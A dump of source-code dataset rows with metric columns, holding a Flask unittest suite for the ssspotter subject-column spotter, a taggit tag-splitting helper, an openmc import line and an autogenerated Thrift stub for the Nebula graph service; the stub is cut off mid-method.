| 0.675742
| 48,670
| 427,702
| 5.714362
| 0.011054
| 0.016252
| 0.02641
| 0.060435
| 0.969405
| 0.953743
| 0.942891
| 0.928739
| 0.916931
| 0.900456
| 0
| 0.004256
| 0.244088
| 427,702
| 11,792
| 131
| 36.270522
| 0.855978
| 0.218217
| 0
| 0.738382
| 0
| 0
| 0.073947
| 0.020151
| 0
| 0
| 0
| 0
| 0.129457
| 1
| 0.03135
| false
| 0.000123
| 0.00627
| 0.000246
| 0.037866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4b4af449ff5a13672805f3fbee5070f89b2c817
| 5,645
|
py
|
Python
|
tests/test_simple.py
|
oeg-upm/ssspotter
|
a9e2906c1193a9550bb7ebc3baf0d5f9b173ad50
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple.py
|
oeg-upm/ssspotter
|
a9e2906c1193a9550bb7ebc3baf0d5f9b173ad50
|
[
"Apache-2.0"
] | 2
|
2019-07-09T09:13:09.000Z
|
2021-06-01T23:58:47.000Z
|
tests/test_simple.py
|
oeg-upm/ssspotter
|
a9e2906c1193a9550bb7ebc3baf0d5f9b173ad50
|
[
"Apache-2.0"
] | null | null | null |
from app import app
import unittest
import os
from spotter import T_NON_NUM, T_LEFT_MOST, T_DISTINCT
class TestSimpleSpotter(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
# creates a test client
self.app = app.test_client()
# propagate the exceptions to the test client
self.app.testing = True
app.testing = True
def tearDown(self):
pass
def test_left_most_0(self):
fname = "sample_col_0.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_LEFT_MOST, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_left_most_1(self):
fname = "sample_col_1.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_LEFT_MOST, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_left_most_no(self):
fname = "sample_col_no.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_LEFT_MOST, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_non_num_0(self):
fname = "sample_col_0.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_NON_NUM, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 0)
def test_non_num_1(self):
fname = "sample_col_1.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_NON_NUM, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 1)
def test_non_num_no(self):
fname = "sample_col_no.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_NON_NUM, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], -1)
def test_distinct_num_2(self):
fname = "sample_col_2.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 2)
def test_distinct_num_3(self):
fname = "sample_col_3.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], 3)
def test_distinct_empty(self):
fname = "sample_col_empty.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], -1)
def test_distinct_nodata(self):
fname = "sample_col_nodata.csv"
fdir = os.path.join("tests", fname)
f = open(fdir)
data = {'technique': T_DISTINCT, 'callback': ""}
data['table'] = (f, "sample.csv")
result = self.app.post('/spot', data=data, content_type='multipart/form-data')
self.assertEqual(result.status_code, 200, msg=result.data)
self.assertTrue(result.is_json)
j = result.get_json()
self.assertEqual(j["subject_col_id"], -1)
if __name__ == '__main__':
unittest.main()
| 37.885906
| 86
| 0.607086
| 742
| 5,645
| 4.432615
| 0.103774
| 0.048647
| 0.045607
| 0.054728
| 0.847978
| 0.847978
| 0.847978
| 0.847978
| 0.847978
| 0.847978
| 0
| 0.01215
| 0.241807
| 5,645
| 148
| 87
| 38.141892
| 0.756308
| 0.011515
| 0
| 0.75969
| 0
| 0
| 0.166577
| 0.003765
| 0
| 0
| 0
| 0
| 0.232558
| 1
| 0.108527
| false
| 0.023256
| 0.031008
| 0
| 0.147287
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4b8455b29a4d295ab95f6c2b45d0da1340ceb8a
| 108
|
py
|
Python
|
home/utils.py
|
eviltnan/portfolio
|
a3f82ee867f87e62adc26541afc4de74aed4b186
|
[
"MIT"
] | 7
|
2022-01-22T14:13:51.000Z
|
2022-03-25T22:24:14.000Z
|
home/utils.py
|
eviltnan/portfolio
|
a3f82ee867f87e62adc26541afc4de74aed4b186
|
[
"MIT"
] | 3
|
2019-12-06T13:34:09.000Z
|
2020-01-06T19:23:26.000Z
|
home/utils.py
|
thorin-schiffer/freeturn
|
a3f82ee867f87e62adc26541afc4de74aed4b186
|
[
"MIT"
] | 1
|
2018-12-13T20:18:36.000Z
|
2018-12-13T20:18:36.000Z
|
from taggit.utils import _parse_tags
def tags_splitter(s):
return [t.lower() for t in _parse_tags(s)]
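# Usage sketch; the split behaviour is assumed from taggit's documented parsing
# rules (with a comma present it splits on commas only), after which this
# helper lowercases each tag:
def example_tags():
    return tags_splitter("Django, GIS")  # expected: ['django', 'gis']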
| 18
| 46
| 0.731481
| 19
| 108
| 3.894737
| 0.736842
| 0.243243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 108
| 5
| 47
| 21.6
| 0.822222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d4efefb0c59b8befed0a3eb00155e4cf9605d8f0
| 79
|
py
|
Python
|
openmc_plasma_source/plotting/__init__.py
|
mdfaisal98/openmc-plasma-source
|
e55d61ce6d641f4d382ce298b6f6335cd46bc507
|
[
"MIT"
] | null | null | null |
openmc_plasma_source/plotting/__init__.py
|
mdfaisal98/openmc-plasma-source
|
e55d61ce6d641f4d382ce298b6f6335cd46bc507
|
[
"MIT"
] | null | null | null |
openmc_plasma_source/plotting/__init__.py
|
mdfaisal98/openmc-plasma-source
|
e55d61ce6d641f4d382ce298b6f6335cd46bc507
|
[
"MIT"
] | null | null | null |
from .plot_tokamak_source import plot_tokamak_source_3D, scatter_tokamak_source
| 79
| 79
| 0.924051
| 12
| 79
| 5.5
| 0.583333
| 0.590909
| 0.515152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013333
| 0.050633
| 79
| 1
| 79
| 79
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be0970343a4115fd20fce009d812d35335e013bd
| 30,187
|
py
|
Python
|
graph/GraphService.py
|
jievince/nebula-python
|
961097959aea83cb1bed6ee956cfe0fb002bd75b
|
[
"Apache-2.0"
] | 1
|
2020-08-16T18:53:12.000Z
|
2020-08-16T18:53:12.000Z
|
graph/GraphService.py
|
jievince/nebula-python
|
961097959aea83cb1bed6ee956cfe0fb002bd75b
|
[
"Apache-2.0"
] | null | null | null |
graph/GraphService.py
|
jievince/nebula-python
|
961097959aea83cb1bed6ee956cfe0fb002bd75b
|
[
"Apache-2.0"
] | null | null | null |
#
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
# @generated
#
from __future__ import absolute_import
import six
from thrift.util.Recursive import fix_spec
from thrift.Thrift import *
from thrift.protocol.TProtocol import TProtocolException
from .ttypes import *
import common.ttypes
from thrift.Thrift import TProcessor
import pprint
import warnings
from thrift import Thrift
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.protocol import TCompactProtocol
from thrift.protocol import THeaderProtocol
fastproto = None
if not '__pypy__' in sys.builtin_module_names:
try:
from thrift.protocol import fastproto
except:
pass
all_structs = []
UTF8STRINGS = bool(0) or sys.version_info.major >= 3
from thrift.util.Decorators import *
class Iface:
def authenticate(self, username=None, password=None):
"""
Parameters:
- username
- password
"""
pass
def signout(self, sessionId=None):
"""
Parameters:
- sessionId
"""
pass
def execute(self, sessionId=None, stmt=None):
"""
Parameters:
- sessionId
- stmt
"""
pass
class ContextIface:
def authenticate(self, handler_ctx, username=None, password=None):
"""
Parameters:
- username
- password
"""
pass
def signout(self, handler_ctx, sessionId=None):
"""
Parameters:
- sessionId
"""
pass
def execute(self, handler_ctx, sessionId=None, stmt=None):
"""
Parameters:
- sessionId
- stmt
"""
pass
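# A minimal handler sketch (illustrative, not generated): implement Iface and
# hand the instance to the Processor defined below. AuthResponse and
# ExecutionResponse come from .ttypes; their fields are left at defaults here.
class _EchoHandler(Iface):
    def authenticate(self, username=None, password=None):
        return AuthResponse()
    def signout(self, sessionId=None):
        pass  # oneway call: nothing is sent back
    def execute(self, sessionId=None, stmt=None):
        return ExecutionResponse()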
# HELPER FUNCTIONS AND STRUCTURES
class authenticate_args:
"""
Attributes:
- username
- password
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.username = iprot.readString().decode('utf-8') if UTF8STRINGS else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.password = iprot.readString().decode('utf-8') if UTF8STRINGS else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('authenticate_args')
if self.username != None:
oprot.writeFieldBegin('username', TType.STRING, 1)
oprot.writeString(self.username.encode('utf-8')) if UTF8STRINGS and not isinstance(self.username, bytes) else oprot.writeString(self.username)
oprot.writeFieldEnd()
if self.password != None:
oprot.writeFieldBegin('password', TType.STRING, 2)
oprot.writeString(self.password.encode('utf-8')) if UTF8STRINGS and not isinstance(self.password, bytes) else oprot.writeString(self.password)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.username is not None:
value = pprint.pformat(self.username, indent=0)
value = padding.join(value.splitlines(True))
L.append(' username=%s' % (value))
if self.password is not None:
value = pprint.pformat(self.password, indent=0)
value = padding.join(value.splitlines(True))
L.append(' password=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(authenticate_args)
authenticate_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'username', True, None, 2, ), # 1
(2, TType.STRING, 'password', True, None, 2, ), # 2
)
authenticate_args.thrift_struct_annotations = {
}
authenticate_args.thrift_field_annotations = {
}
def authenticate_args__init__(self, username=None, password=None,):
self.username = username
self.password = password
authenticate_args.__init__ = authenticate_args__init__
def authenticate_args__setstate__(self, state):
state.setdefault('username', None)
state.setdefault('password', None)
self.__dict__ = state
authenticate_args.__getstate__ = lambda self: self.__dict__.copy()
authenticate_args.__setstate__ = authenticate_args__setstate__
class authenticate_result:
"""
Attributes:
- success
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = AuthResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('authenticate_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.success is not None:
value = pprint.pformat(self.success, indent=0)
value = padding.join(value.splitlines(True))
L.append(' success=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(authenticate_result)
authenticate_result.thrift_spec = (
(0, TType.STRUCT, 'success', [AuthResponse, AuthResponse.thrift_spec, False], None, 2, ), # 0
)
authenticate_result.thrift_struct_annotations = {
}
authenticate_result.thrift_field_annotations = {
}
def authenticate_result__init__(self, success=None,):
self.success = success
authenticate_result.__init__ = authenticate_result__init__
def authenticate_result__setstate__(self, state):
state.setdefault('success', None)
self.__dict__ = state
authenticate_result.__getstate__ = lambda self: self.__dict__.copy()
authenticate_result.__setstate__ = authenticate_result__setstate__
class signout_args:
"""
Attributes:
- sessionId
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.sessionId = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('signout_args')
if self.sessionId != None:
oprot.writeFieldBegin('sessionId', TType.I64, 1)
oprot.writeI64(self.sessionId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.sessionId is not None:
value = pprint.pformat(self.sessionId, indent=0)
value = padding.join(value.splitlines(True))
L.append(' sessionId=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(signout_args)
signout_args.thrift_spec = (
None, # 0
(1, TType.I64, 'sessionId', None, None, 2, ), # 1
)
signout_args.thrift_struct_annotations = {
}
signout_args.thrift_field_annotations = {
}
def signout_args__init__(self, sessionId=None,):
self.sessionId = sessionId
signout_args.__init__ = signout_args__init__
def signout_args__setstate__(self, state):
state.setdefault('sessionId', None)
self.__dict__ = state
signout_args.__getstate__ = lambda self: self.__dict__.copy()
signout_args.__setstate__ = signout_args__setstate__
class execute_args:
"""
Attributes:
- sessionId
- stmt
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.sessionId = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.stmt = iprot.readString().decode('utf-8') if UTF8STRINGS else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('execute_args')
if self.sessionId != None:
oprot.writeFieldBegin('sessionId', TType.I64, 1)
oprot.writeI64(self.sessionId)
oprot.writeFieldEnd()
if self.stmt != None:
oprot.writeFieldBegin('stmt', TType.STRING, 2)
oprot.writeString(self.stmt.encode('utf-8')) if UTF8STRINGS and not isinstance(self.stmt, bytes) else oprot.writeString(self.stmt)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.sessionId is not None:
value = pprint.pformat(self.sessionId, indent=0)
value = padding.join(value.splitlines(True))
L.append(' sessionId=%s' % (value))
if self.stmt is not None:
value = pprint.pformat(self.stmt, indent=0)
value = padding.join(value.splitlines(True))
L.append(' stmt=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(execute_args)
execute_args.thrift_spec = (
None, # 0
(1, TType.I64, 'sessionId', None, None, 2, ), # 1
(2, TType.STRING, 'stmt', True, None, 2, ), # 2
)
execute_args.thrift_struct_annotations = {
}
execute_args.thrift_field_annotations = {
}
def execute_args__init__(self, sessionId=None, stmt=None,):
self.sessionId = sessionId
self.stmt = stmt
execute_args.__init__ = execute_args__init__
def execute_args__setstate__(self, state):
state.setdefault('sessionId', None)
state.setdefault('stmt', None)
self.__dict__ = state
execute_args.__getstate__ = lambda self: self.__dict__.copy()
execute_args.__setstate__ = execute_args__setstate__
class execute_result:
"""
Attributes:
- success
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExecutionResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('execute_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
